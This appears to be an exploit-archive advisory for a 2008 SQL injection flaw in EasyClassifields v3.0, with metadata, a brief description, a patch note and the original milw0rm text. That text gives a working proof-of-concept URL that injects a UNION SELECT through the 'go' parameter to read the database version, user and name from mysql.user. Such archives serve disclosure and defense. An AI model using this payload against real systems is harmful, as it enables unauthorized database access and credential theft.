EasyClassifields v3.0 SQL Injection

vendor:

EasyClassifields

by:

e.wiZz!

CVSS

HIGH

SQL Injection

CWE

Product Name: EasyClassifields

Affected Version From: 3

Affected Version To: 3

Patch Exists: Yes

Related CWE: N/A

CPE: a:myiosoft:easyclassifields

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

EasyClassifields v3.0 SQL Injection

A SQL injection vulnerability exists in EasyClassifields v3.0. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to execute arbitrary SQL commands on the underlying database.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to apply the patch as soon as possible.

Source

Exploit-DB raw data:

##############EasyClassifields v3.0 SQL Injection#######################

####By:     e.wiZz!
####Info:   Bosnian Idiot FTW!
####Site:  infected.blogger.ba
####Greetz:   Luigi,suN8Hclf,str0ke
In the wild...

##################################################################

###Script Site: http://myiosoft.com/?1.6.0.0
###Vulnerability:

http://www.inthewild.xxx/path/index.php?PageSection=x&page=browse&go=<sql>

PoC on demo site:

http://myiosoft.com/products/EasyClassifields/demo/staticpages/easyclassifields/index.php?PageSection=0&page=browse&go=-1%20union%20select%20all%20concat(0x3a,version(),0x3a,user(),0x3a,0x3a,database()),2%20from%20mysql.user

# milw0rm.com [2008-09-01]